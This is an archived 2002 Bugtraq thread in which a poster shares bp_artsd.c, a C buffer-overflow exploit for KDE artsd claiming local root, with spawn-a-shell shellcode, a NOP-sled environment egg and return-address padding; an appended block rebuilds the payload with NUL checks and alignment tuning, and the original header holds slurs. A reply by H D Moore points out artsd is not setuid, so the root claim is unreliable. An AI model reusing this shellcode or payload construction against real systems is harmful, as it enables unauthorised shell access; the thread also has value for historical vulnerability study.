8786472 2002-07-29 19:55 +0200  /10 lines/ kokane <kokane@segfault.ch>
Sent by: joel@lysator.liu.se
Imported: 2002-07-29 21:11 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <23328>
Subject: KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
From: "kokane" <kokane@segfault.ch>
To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>,
 <submissions@packetstormsecurity.org>
Message-ID: <000a01c23729$1a744710$56dde6c2@cuntNIX>

KDE 2/3 artsd 1.0.0 local root exploit PoC.

Cheers,
-kokane
(8786472) /kokane <kokane@segfault.ch>/-------------
Attachment (application/octet-stream) in text 8786473
Comment in text 8787187 by H D Moore <hdm@digitaloffense.net>
8786473 2002-07-29 19:55 +0200  /64 lines/ kokane <kokane@segfault.ch>
Attachment filename: "bp_artsd.c"
Imported: 2002-07-29 21:11 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <23329>
Attachment (text/plain) to text 8786472
Subject: Attachment (bp_artsd.c) to: KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
/* bp_artsd.c
 * KDE 2/3 artsd 1.0.0 local root exploit
 *
 * credits: dvorak (helped me A LOT!@#), electronicsouls.org
 *
 * greets:
 * bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man, 
 * philer, preamble, eth1cal
 * fucks to: fd0 (du schwule schlumpf)
 *
 * -kokane <kokane@segfault.ch>
 */

#include <stdio.h>
#include <string.h>	/* memset, memcpy, strlen */
#include <unistd.h>
#include <stdlib.h>

#define BSIZE	1033
#define ESIZE   5120
#define RET	0xbffff808	/* tested on suse linux 8.0  */

unsigned char buttcode[] =
	"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0);
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
	"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void anal(char *rets, char *evil) {
  char * arg_[] = { "artsd", "-m", rets, 0 };
  char * env_[] = { evil, 0 };	/* the egg is the only environment entry */
  execve("/opt/kde3/bin/artsd", arg_, env_);
  perror("execve");		/* only reached if the exec failed */
  exit(1);
}

int main(int argc, char **argv) {
  char buf[BSIZE], egg[ESIZE];
  unsigned long retaddr=RET;
  int i;

  fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit (bp_artsd.c)\n+ by kokane/buttP!RATEZ\n");

  if (argc >  1)
	retaddr = strtoul(argv[1], NULL, 0);
  fprintf(stdout, "\n+ ret_addr: 0x%lx\n\n", retaddr);

  /* fill our buffer with ret_addr's (4-byte stores: assumes a 32-bit target) */
  for (i = BSIZE-1 ; i >= 4 ; i = i-4)
	*(unsigned long *)&buf[i - 4] = retaddr;

  /* fill our evil environment variable with nops + shellcode
     (the shellcode, with its terminating NUL, sits at the very end of the egg) */
  memset(egg, 0x90, sizeof(egg));
  for (i = 0; i <= (int)strlen((char *)buttcode) ;i++)
	egg[ESIZE - 1 - i] = buttcode[strlen((char *)buttcode) - i];
  memcpy(egg,"UNF=",4);

  buf[BSIZE - 1] = '\0';
  egg[ESIZE - 1] = '\0';

  anal(buf, egg);
  return 0;
}
/* buttP!RATEZ - providing k-rad anal sex since 2001 */
(8786473) /kokane <kokane@segfault.ch>/---(Re-wrapped)
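Added example (not part of kokane's post or of bp_artsd.c): the same two payload pieces rebuilt with the checks worth running before launching it. execve() passes argv and envp to the target as C strings, so a NUL byte in the return address or in the shellcode truncates the payload silently; the block also adds an align shift (this example's own parameter, not in the original) for the 1-3 byte offsets tried when the saved return address is not 4-byte aligned to the overflowed buffer. Sizes, the UNF variable name and the shellcode bytes are taken from the post; the target's stack layout is not modelled.

```c
/* payload_layout.c
 * Added example; not code from kokane's post. Rebuilds the "-m" argument
 * of repeated return addresses and the NAME=<NOP sled><shellcode>
 * environment string, with NUL-byte checks and an alignment shift.
 * The 32-bit little-endian layout, BSIZE/ESIZE and "UNF" follow the post.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shellcode bytes exactly as posted in bp_artsd.c (69 bytes, no terminator). */
static const unsigned char SHELLCODE[] = {
    0x33,0xdb,0x33,0xc0,0xb0,0x1b,0xcd,0x80,
    0x31,0xdb,0x89,0xd8,0xb0,0x17,0xcd,0x80,
    0x31,0xc0,0x50,0x50,0xb0,0xb5,0xcd,0x80,
    0xeb,0x1f,0x5e,0x89,0x76,0x08,0x31,0xc0,0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
    0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,
    0x80,0xe8,0xdc,0xff,0xff,0xff,'/','b','i','n','/','s','h'
};

/* 1 if any of the n bytes at p is NUL (would end the C string early). */
int has_nul(const unsigned char *p, size_t n) {
    for (size_t k = 0; k < n; k++)
        if (p[k] == 0) return 1;
    return 0;
}

/* Write v little-endian into out; 1 if all four bytes are non-NUL. */
int put_le32(unsigned char out[4], uint32_t v) {
    for (int k = 0; k < 4; k++) out[k] = (unsigned char)(v >> (8 * k));
    return !has_nul(out, 4);
}

/* Fill buf (size bytes, last one reserved for the NUL) with copies of ret
 * after `align` filler bytes. Returns the number of complete copies, or 0
 * when ret contains a NUL byte or not even one copy fits. */
size_t build_ret_buffer(char *buf, size_t size, uint32_t ret, size_t align) {
    unsigned char le[4];
    if (size < 1 || align > 3 || !put_le32(le, ret)) return 0;
    size_t usable = size - 1;
    if (usable < align + 4) return 0;
    memset(buf, 'A', usable);                 /* filler; never executed */
    size_t copies = (usable - align) / 4;
    for (size_t k = 0; k < copies; k++)
        memcpy(buf + align + 4 * k, le, 4);
    buf[usable] = '\0';
    return copies;
}

/* Lay out NAME=<sled><shellcode> so the shellcode ends right before the
 * terminating NUL. Returns the sled length, or 0 if it does not fit or the
 * shellcode itself contains a NUL. */
size_t build_egg(char *egg, size_t size, const char *name,
                 const unsigned char *sc, size_t sclen) {
    size_t prefix = strlen(name) + 1;         /* "NAME=" */
    if (has_nul(sc, sclen) || size < prefix + sclen + 1) return 0;
    size_t sled = size - 1 - prefix - sclen;
    memcpy(egg, name, prefix - 1);
    egg[prefix - 1] = '=';
    memset(egg + prefix, 0x90, sled);         /* NOP sled */
    memcpy(egg + prefix + sled, sc, sclen);
    egg[size - 1] = '\0';
    return sled;
}

int main(void) {
    static char buf[1033], egg[5120];         /* BSIZE / ESIZE from the post */
    size_t copies = build_ret_buffer(buf, sizeof buf, 0xbffff808u, 0);
    size_t sled = build_egg(egg, sizeof egg, "UNF", SHELLCODE, sizeof SHELLCODE);
    printf("ret copies: %zu, sled: %zu bytes, shellcode: %zu bytes, egg strlen: %zu\n",
           copies, sled, sizeof SHELLCODE, strlen(egg));
    /* 0xbffff800 would put a NUL into the argument and is rejected */
    printf("0xbffff800 usable copies: %zu\n",
           build_ret_buffer(buf, sizeof buf, 0xbffff800u, 0));
    return 0;
}
```

With the post's sizes the argument carries 258 aligned copies of the return address and the egg is a 5119-character string whose last bytes are the shellcode; shifting align to 1 drops one copy and moves every copy by one byte, which is the knob to turn when the address lands in the saved EIP off by one to three bytes.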
8787187 2002-07-29 13:43 -0500  /52 lines/ H D Moore <hdm@digitaloffense.net>
Sent by: joel@lysator.liu.se
Imported: 2002-07-30 00:15 by Brevbäraren
External recipient: kokane <kokane@segfault.ch>
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <23335>
Comment to text 8786472 by kokane <kokane@segfault.ch>
Subject: Re: [VulnWatch] KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
From: H D Moore <hdm@digitaloffense.net>
To: "kokane" <kokane@segfault.ch>, <bugtraq@securityfocus.com>,
 <vulnwatch@vulnwatch.org>, <submissions@packetstormsecurity.org>
Message-ID: <200207291343.31929.hdm@digitaloffense.net>

The artsd binary is not setuid; it's supposed to be called by the
setuid artswrapper application (which sets a higher scheduling
priority, setuid(getuid())'s and executes the real artsd binary). I
haven't bothered to look through the shellcode for backdoors yet...

---

hdm@masada:/tools> head -n 20 bp_artsd.c && ls -la /opt/kde3/bin/artsd && cat /etc/SuSE-release

/* bp_artsd.c
 * KDE 2/3 artsd 1.0.0 local root exploit
 *
 * credits: dvorak (helped me A LOT!@#), electronicsouls.org
 *
 * greets:
 * bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man,
 * philer, preamble, eth1cal
 * fucks to: fd0 (du schwule schlumpf)
 *
 * -kokane <kokane@segfault.ch>
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define BSIZE   1033
#define ESIZE   5120
#define RET     0xbffff808      /* tested on suse linux 8.0  */

-rwxr-xr-x    1 root     root       126696 May 14 19:30 /opt/kde3/bin/artsd

SuSE Linux 8.0 (i386)
VERSION = 8.0
On Monday 29 July 2002 12:55, kokane wrote:
> KDE 2/3 artsd 1.0.0 local root exploit PoC.
>
> Cheers,
> -kokane
(8787187) /H D Moore <hdm@digitaloffense.net>/(Re-wrapped)